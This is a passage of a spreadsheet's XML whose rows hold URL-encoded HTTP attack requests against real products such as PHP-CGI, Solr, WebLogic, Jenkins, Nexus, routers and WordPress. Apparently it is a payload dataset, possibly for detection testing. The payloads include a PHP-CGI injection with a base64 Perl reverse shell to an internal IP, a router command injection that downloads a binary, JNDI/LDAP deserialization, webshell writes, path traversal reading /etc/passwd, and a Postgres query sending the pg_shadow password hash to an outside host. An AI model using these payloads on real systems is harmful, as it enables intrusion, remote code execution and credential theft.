        <v>POST%20%2F%3F-d%2Ballow_url_include%253don%2B-d%2Bsafe_mode%253dofF%2B--define%2Bsuhosin.simulation%253doN%2B-%2564%2Bdisable_functions%253d%2522%2522%2B--define%2Bopen_basedir%253dnone%2B--define%2Bauto_prepend_file%253dphp%3A%2F%2Finput%2B-%2564%2Bcgi.force_redirect%253dfALSE%2B--define%2Bcgi.redirect_status_env%253d0%2B--no-php-ini%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.67%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201925%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0A%3C%3Fphp%20%2F%2A%3C%3Fphp%20%2F%2A%2A%2F%20%20%20%20%20%20%40error_reporting%280%29%3B%20%20%20%20%20%20%40set_time_limit%280%29%3B%20%40ignore_user_abort%281%29%3B%20%40ini_set%28%27max_execution_time%27%2C0%29%3B%20%20%20%20%20%20%24ZxPDVY%3D%40ini_get%28%27disable_functions%27%29%3B%20%20%20%20%20%20if%28%21empty%28%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20%24ZxPDVY%3Dpreg_replace%28%27%2F%5B%2C%20%5D%2B%2F%27%2C%20%27%2C%27%2C%20%24ZxPDVY%29%3B%20%20%20%20%20%20%20%20%24ZxPDVY%3Dexplode%28%27%2C%27%2C%20%24ZxPDVY%29%3B%20%20%20%20%20%20%20%20%24ZxPDVY%3Darray_map%28%27trim%27%2C%20%24ZxPDVY%29%3B%20%20%20%20%20%20%7Delse%7B%20%20%20%20%20%20%20%20%24ZxPDVY%3Darray%28%29%3B%20%20%20%20%20%20%7D%20%20%20%20%20%20%24c%20%3D%20base64_decode%28%27cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjI0OC4xMzI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTtzeXN0ZW0kXyB3aGlsZTw%2BOyc%3D%27%29%3B%20%20%20%20%20%20if%20%28FALSE%20%21%3D%3D%20strpos%28strtolower%28PHP_OS%29%2C%20%27win%27%20%29%29%20%7B%20%20%20%20%20%20%20%20%24c%3D%24c.%22%202%3E%261%5Cn%22%3B%20%20%20%20%20%20%7D%20%20%20%20%20%20%24jRxxFrY%3D%27is_callable%27%3B%20%20%20%20%20%20%24VdAn%3D%27in_array%27%3B%20%20%20%20%20%20%20%20%20%20%20%20if%28%24jRxxFrY%28%27passthru%27%29and%21%24VdAn%28%27passthru%27%2C%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20passthru%28%24c%29%3B%20%20%20%20%20%20%20%20%24leaCHw%3Dob_get_contents%28%29%3B%20%20%20%20%20%20%20%20ob_end_clean%28%29%3B%20%20%20%20%20%20%7Delse%20%20%20%20%20%20if%28%24jRxxFrY%28%27system%27%29and%21%24VdAn%28%27system%27%2C%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20ob_start%28%29%3B%20%20%20%20%20%20%20%20system%28%24c%29%3B%20%20%20%20%20%20%20%20%24leaCHw%3Dob_get_contents%28%29%3B%20%20%20%20%20%20%20%20ob_end_clean%28%29%3B%20%20%20%20%20%20%7Delse%20%20%20%20%20%20if%28%24jRxxFrY%28%27shell_exec%27%29and%21%24VdAn%28%27shell_exec%27%2C%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20%24leaCHw%3Dshell_exec%28%24c%29%3B%20%20%20%20%20%20%7Delse%20%20%20%20%20%20if%28%24jRxxFrY%28%27exec%27%29and%21%24VdAn%28%27exec%27%2C%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20%24leaCHw%3Darray%28%29%3B%20%20%20%20%20%20%20%20exec%28%24c%2C%24leaCHw%29%3B%20%20%20%20%20%20%20%20%24leaCHw%3Djoin%28chr%2810%29%2C%24leaCHw%29.chr%2810%29%3B%20%20%20%20%20%20%7Delse%20%20%20%20%20%20if%28%24jRxxFrY%28%27proc_open%27%29and%21%24VdAn%28%27proc_open%27%2C%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20%24handle%3Dproc_open%28%24c%2Carray%28array%28%27pipe%27%2C%27r%27%29%2Carray%28%27pipe%27%2C%27w%27%29%2Carray%28%27pipe%27%2C%27w%27%29%29%2C%24pipes%29%3B%20%20%20%20%20%20%20%20%24leaCHw%3DNULL%3B%20%20%20%20%20%20%20%20while%28%21feof%28%24pipes%5B1%5D%29%29%7B%20%20%20%20%20%20%20%20%20%20%24leaCHw.%3Dfread%28%24pipes%5B1%5D%2C1024%29%3B%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%40proc_close%28%24handle%29%3B%20%20%20%20%20%20%7Delse%20%20%20%20%20%20if%28%24jRxxFrY%28%27popen%27%29and%21%24VdAn%28%27popen%27%2C%24ZxPDVY%29%29%7B%20%20%20%20%20%20%20%20%24fp%3Dpopen%28%24c%2C%27r%27%29%3B%20%20%20%20%20%20%20%20%24leaCHw%3DNULL%3B%20%20%20%20%20%20%20%20if%28is_resource%28%24fp%29%29%7B%20%20%20%20%20%20%20%20%20%20while%28%21feof%28%24fp%29%29%7B%20%20%20%20%20%20%20%20%20%20%20%20%24leaCHw.%3Dfread%28%24fp%2C1024%29%3B%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%40pclose%28%24fp%29%3B%20%20%20%20%20%20%7Delse%20%20%20%20%20%20%7B%20%20%20%20%20%20%20%20%24leaCHw%3D0%3B%20%20%20%20%20%20%7D%20%20%20%20</v>
      </c>
    </row>
    <row r="116" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A116" s="2" t="s">
        <v>56</v>
      </c>
      <c r="B116" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C116" t="s">
        <v>219</v>
      </c>
      <c r="D116" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fsolr%2Fadmin%2Fcores%3FindexInfo%3Dfalse%26wt%3Djson%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="117" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A117" s="2" t="s">
        <v>55</v>
      </c>
      <c r="B117" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C117" t="s">
        <v>220</v>
      </c>
      <c r="D117" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fservice%2Frest%2Fbeta%2Frepositories%2Fgo%2Fgroup%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20203%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0ANx-Anti-Csrf-Token%3A%2090f7407e-78bc-4803-b5a1-13d3aea66e9e%0ASec-Fetch-Mode%3A%20cors%0ASec-Fetch-Site%3A%20same-origin%0AX-Nexus-Ui%3A%20true%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%0A%20%20%22name%22%3A%20%22internal%22%2C%0A%20%20%22online%22%3A%20true%2C%0A%20%20%22storage%22%3A%20%7B%0A%20%20%20%20%22blobStoreName%22%3A%20%22default%22%2C%0A%20%20%20%20%22strictContentTypeValidation%22%3A%20true%0A%20%20%7D%2C%0A%20%20%22group%22%3A%20%7B%0A%20%20%20%20%22memberNames%22%3A%20%5B%22%24%5C%5CA%7B233%2A233%2A233%7D%22%5D%0A%20%20%7D%0A%7D</v>
      </c>
    </row>
    <row r="118" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A118" s="2" t="s">
        <v>54</v>
      </c>
      <c r="B118" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C118" t="s">
        <v>221</v>
      </c>
      <c r="D118" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fapi%2Fconsole%2Fapi_server%3Fsense_version%3D%2540%2540SENSE_VERSION%26apis%3D..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F55.0.2919.83%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="119" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A119" s="2" t="s">
        <v>53</v>
      </c>
      <c r="B119" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C119" t="s">
        <v>222</v>
      </c>
      <c r="D119" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fsolr%2Fdemo%2Fconfig%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.4%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20259%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0A%0A%7B%0A%20%20%22update-queryresponsewriter%22%3A%20%7B%0A%20%20%20%20%22startup%22%3A%20%22lazy%22%2C%0A%20%20%20%20%22name%22%3A%20%22velocity%22%2C%0A%20%20%20%20%22class%22%3A%20%22solr.VelocityResponseWriter%22%2C%0A%20%20%20%20%22template.base.dir%22%3A%20%22%22%2C%0A%20%20%20%20%22solr.resource.loader.enabled%22%3A%20%22true%22%2C%0A%20%20%20%20%22params.resource.loader.enabled%22%3A%20%22true%22%0A%20%20%7D%0A%7D</v>
      </c>
    </row>
    <row r="120" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A120" s="2" t="s">
        <v>52</v>
      </c>
      <c r="B120" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C120" t="s">
        <v>223</v>
      </c>
      <c r="D120" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F..%252Fconf%2Fconfig.properties%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="121" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A121" s="2" t="s">
        <v>51</v>
      </c>
      <c r="B121" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C121" t="s">
        <v>224</v>
      </c>
      <c r="D121" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fruleinfo%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20180%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0A%21%21org.apache.commons.configuration2.ConfigurationMap%20%5B%21%21org.apache.commons.configuration2.JNDIConfiguration%20%5B%21%21javax.naming.InitialContext%20%5B%5D%2C%20%22ldap%3A%2F%2F192.168.3.104%3A1389%2FExploit%22%5D%5D</v>
      </c>
    </row>
    <row r="122" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A122" s="2" t="s">
        <v>50</v>
      </c>
      <c r="B122" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C122" t="s">
        <v>225</v>
      </c>
      <c r="D122" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%2573%2571%254c%2553%2565%2572%2576%2565%2572%2F%2553%2565%2541%2572%2563%2548%2F%2573%2545%2561%2572%2563%2568.%2541%2573%2550%3F%256e%2561%256d%2565%3D%2531%2520%2575%254e%2569%256f%254e%2520%2553%2565%256c%2545%2563%2554%2520%2531%252c%2532%252c%2533%2520%252d%252d%2520%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.2117.157%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="123" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A123" s="2" t="s">
        <v>49</v>
      </c>
      <c r="B123" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C123" t="s">
        <v>226</v>
      </c>
      <c r="D123" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fboaform%2Fadmin%2FformPing%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2075%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%3B%20charset%3DUTF-8%0APragma%3A%20no-cache%0AX-Requested-With%3A%20XMLHttpRequest%0A%0Atarget_addr%3D%3Bcd%20%2Ftmp%3B%20rm%20-rf%3B%20wget%20http%3A%2F%2F51.254.23.227%2Fbins%2Fn%3Bchmod%20777%20n%3B</v>
      </c>
    </row>
    <row r="124" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A124" s="2" t="s">
        <v>36</v>
      </c>
      <c r="B124" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C124" t="s">
        <v>227</v>
      </c>
      <c r="D124" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fapply.cgi%3Fcurrent_page%3DMain_AdmStatus_Content.asp%26next_page%3DMain_AdmStatus_Content.asp%26next_host%26sid_list%3DFirewallConfig%253B%26group_id%26modified%3D0%26action_mode%3D%2BRefresh%2B%26first_time%26action_script%26preferred_lang%3DEN%26SystemCmd%3Dtouch%2520%2Ftmp%2Fpwned%26action%3DRefresh%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20i686%20on%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F53.0.2820.59%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="125" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A125" s="2" t="s">
        <v>48</v>
      </c>
      <c r="B125" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C125" t="s">
        <v>228</v>
      </c>
      <c r="D125" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fwls-wsat%2FCoordinatorPortType%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20644%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20text%2Fxml%0A%0A%3Csoapenv%3AEnvelope%20xmlns%3Asoapenv%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22%3E%0A%20%20%20%20%3Csoapenv%3AHeader%3E%0A%20%20%20%20%3Cwork%3AWorkContext%20xmlns%3Awork%3D%22http%3A%2F%2Fbea.com%2F2004%2F06%2Fsoap%2Fworkarea%2F%22%3E%0A%20%20%20%20%3Cjava%3E%3Cjava%20version%3D%221.4.0%22%20class%3D%22java.beans.XMLDecoder%22%3E%0A%20%20%20%20%3Cobject%20class%3D%22java.io.PrintWriter%22%3E%20%0A%20%20%20%20%3Cstring%3Eservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fbea_wls_internal%2F9j4dqk%2Fwar%2Ftest.jsp%3C%2Fstring%3E%0A%20%20%20%20%3Cvoid%20method%3D%22println%22%3E%0A%3Cstring%3E%0A%20%20%20%20%3C%21%5BCDATA%5B%0A%3C%25%20out.print%28%22webshell%22%29%3B%20%25%3E%0A%20%20%20%20%5D%5D%3E%0A%20%20%20%20%3C%2Fstring%3E%0A%20%20%20%20%3C%2Fvoid%3E%0A%20%20%20%20%3Cvoid%20method%3D%22close%22%2F%3E%0A%20%20%20%20%3C%2Fobject%3E%3C%2Fjava%3E%3C%2Fjava%3E%0A%20%20%20%20%3C%2Fwork%3AWorkContext%3E%0A%20%20%20%20%3C%2Fsoapenv%3AHeader%3E%0A%20%20%20%20%3Csoapenv%3ABody%2F%3E%0A%3C%2Fsoapenv%3AEnvelope%3E</v>
      </c>
    </row>
    <row r="126" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A126" s="2" t="s">
        <v>240</v>
      </c>
      <c r="B126" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C126" t="s">
        <v>241</v>
      </c>
      <c r="D126" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F42.0.2311.135%20Safari%2F537.36%20Edge%2F12.10240%0AAccept-Encoding%3A%20gzip%2C%20deflate%2C%20br%0AAccept%3A%20%2A%2F%2A%0AConnection%3A%20keep-alive%0ARange%3A%20bytes%3D-1217%2C-9223372036854774591</v>
      </c>
    </row>
    <row r="127" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A127" s="2" t="s">
        <v>47</v>
      </c>
      <c r="B127" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C127" t="s">
        <v>257</v>
      </c>
      <c r="D127" t="str">
        <f t="shared" si="1"/>
        <v>Q%01PCREATE%20FUNCTION%20public.array_to_string%28anyarray%2Ctext%29%20RETURNS%20TEXT%20AS%20%24%24%0A%20%20%20%20select%20dblink_connect%28%28select%20%27hostaddr%3D192.168.248.133%20port%3D5432%20user%3Dpostgres%20password%3Dchybeta%20sslmode%3Ddisable%20dbname%3D%27%7C%7C%28SELECT%20passwd%20FROM%20pg_shadow%20WHERE%20usename%3D%27postgres%27%29%29%29%3B%20%0A%20%20%20%20SELECT%20pg_catalog.array_to_string%28%241%2C%242%29%3B%0A%24%24%20LANGUAGE%20SQL%20VOLATILE%3B</v>
      </c>
    </row>
    <row r="128" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A128" s="2" t="s">
        <v>46</v>
      </c>
      <c r="B128" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C128" t="s">
        <v>229</v>
      </c>
      <c r="D128" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2FsecurityRealm%2Fuser%2Fadmin%2FdescriptorByName%2Forg.jenkinsci.plugins.workflow.cps.CpsFlowDefinition%2FcheckScriptCompile%3Fvalue%3D%2540GrabConfig%2528disableChecksums%253dtrue%2529%250a%2540GrabResolver%2528%2527http%253a%2F%2F10.8.51.239%253a8080%2527%2529%250a%2540Grab%2528%2527GrantLLC%253aTranscof%253a7.7.2%2527%2529%250aimport%2520Transcof%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2224.3%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A</v>
      </c>
    </row>
    <row r="129" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A129" s="2" t="s">
        <v>35</v>
      </c>
      <c r="B129" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C129" t="s">
        <v>230</v>
      </c>
      <c r="D129" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fsolr%2Ftest%2Fdataimport%3F_%3D1565835261600%26indent%3Don%26wt%3Djson%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.67%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20679%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0AX-Requested-With%3A%20XMLHttpRequest%0A%0Acommand%3Dfull-import%26verbose%3Dfalse%26clean%3Dfalse%26commit%3Dtrue%26debug%3Dtrue%26core%3Dtest%26dataConfig%3D%253CdataConfig%253E%250A%2B%2B%253CdataSource%2Btype%253D%2522URLDataSource%2522%252F%253E%250A%2B%2B%253Cscript%253E%253C%21%255BCDATA%255B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bfunction%2Bpoc%28%29%257B%2Bjava.lang.Runtime.getRuntime%28%29.exec%28%2522touch%2B%252Ftmp%252Fsuccess%2522%29%253B%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%257D%250A%2B%2B%255D%255D%253E%253C%252Fscript%253E%250A%2B%2B%253Cdocument%253E%250A%2B%2B%2B%2B%253Centity%2Bname%253D%2522stackoverflow%2522%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Burl%253D%2522https%253A%252F%252Fstackoverflow.com%252Ffeeds%252Ftag%252Fsolr%2522%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Bprocessor%253D%2522XPathEntityProcessor%2522%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2BforEach%253D%2522%252Ffeed%2522%250A%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2Btransformer%253D%2522script%253Apoc%2522%2B%252F%253E%250A%2B%2B%253C%252Fdocument%253E%250A%253C%252FdataConfig%253E%26name%3Ddataimport</v>
      </c>
    </row>
    <row r="130" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A130" s="2" t="s">
        <v>239</v>
      </c>
      <c r="B130" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C130" t="s">
        <v>256</v>
      </c>
      <c r="D130" t="str">
        <f t="shared" si="1"/>
        <v>J%0A5.5.23%29%0B4nR-%28%22n%29%08%02%0F%15%7BUth-G%5E%244z%2Chmysql_native_password</v>
      </c>
    </row>
    <row r="131" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A131" s="2" t="s">
        <v>37</v>
      </c>
      <c r="B131" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C131" t="s">
        <v>231</v>
      </c>
      <c r="D131" t="str">
        <f t="shared" ref="D131:D136" si="2">_xlfn.ENCODEURL(C131)</f>
        <v>GET%20%2Fstatic%2F..%2F..%2F..%2Fa%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F55.0.2919.83%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0AIf-None-Match%3A%20W%2F%221f8-A9naZm3yu%2BVHL0CdBLtDGuvxxYs%22%0A</v>
      </c>
    </row>
    <row r="132" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A132" s="2" t="s">
        <v>38</v>
      </c>
      <c r="B132" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C132" t="s">
        <v>232</v>
      </c>
      <c r="D132" t="str">
        <f t="shared" si="2"/>
        <v>GET%20%2Fapi%2Fgeojson%3Furl%3Dfile%3A%2F%2F%2F%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2049.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="133" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A133" s="2" t="s">
        <v>45</v>
      </c>
      <c r="B133" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C133" t="s">
        <v>233</v>
      </c>
      <c r="D133" t="str">
        <f t="shared" si="2"/>
        <v>GET%20%2Fnacos%2Fv1%2Fauth%2Fusers%3FpageNo%3D1%26pageSize%3D9%20HTTP%2F1.1%0AUser-Agent%3A%20Nacos-Server%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="134" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A134" s="2" t="s">
        <v>44</v>
      </c>
      <c r="B134" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C134" t="s">
        <v>234</v>
      </c>
      <c r="D134" t="str">
        <f t="shared" si="2"/>
        <v>POST%20%2Fwp-admin%2Fadmin-ajax.php%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_4%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F49.0.2656.18%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2076%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%3B%20charset%3DUTF-8%0AX-Requested-With%3A%20XMLHttpRequest%0A%0Aaction%3Drm_login_social_user%26email%3Dadmin%2540localhost.org%26security%3D7c574ba56e%20</v>
      </c>
    </row>
    <row r="135" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A135" s="2" t="s">
        <v>39</v>
      </c>
      <c r="B135" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C135" t="s">
        <v>235</v>
      </c>
      <c r="D135" t="str">
        <f t="shared" si="2"/>
        <v>POST%20%2Fpassword_change.cgi%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%204.0%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2049.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2060%0AAccept-Encoding%3A%20identity%0ADNT%3A%201%0A%0Auser%3Drootxx%26pam%3D%26expired%3D2%26old%3Dtest%7Cid%26new1%3Dtest2%26new2%3Dtest2</v>
      </c>
    </row>
    <row r="136" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A136" s="2" t="s">
        <v>40</v>
      </c>
      <c r="B136" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C136" t="s">
        <v>43</v>
      </c>
      <c r="D136" t="str">
        <f t="shared" si="2"/>
        <v>POST%20%2Fcgi-bin%2Fcstecgi.cgi%20HTTP%2F1.1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乐 王</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-29T01:14:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-08T06:12:42Z</dcterms:modified>
</cp:coreProperties>
</file>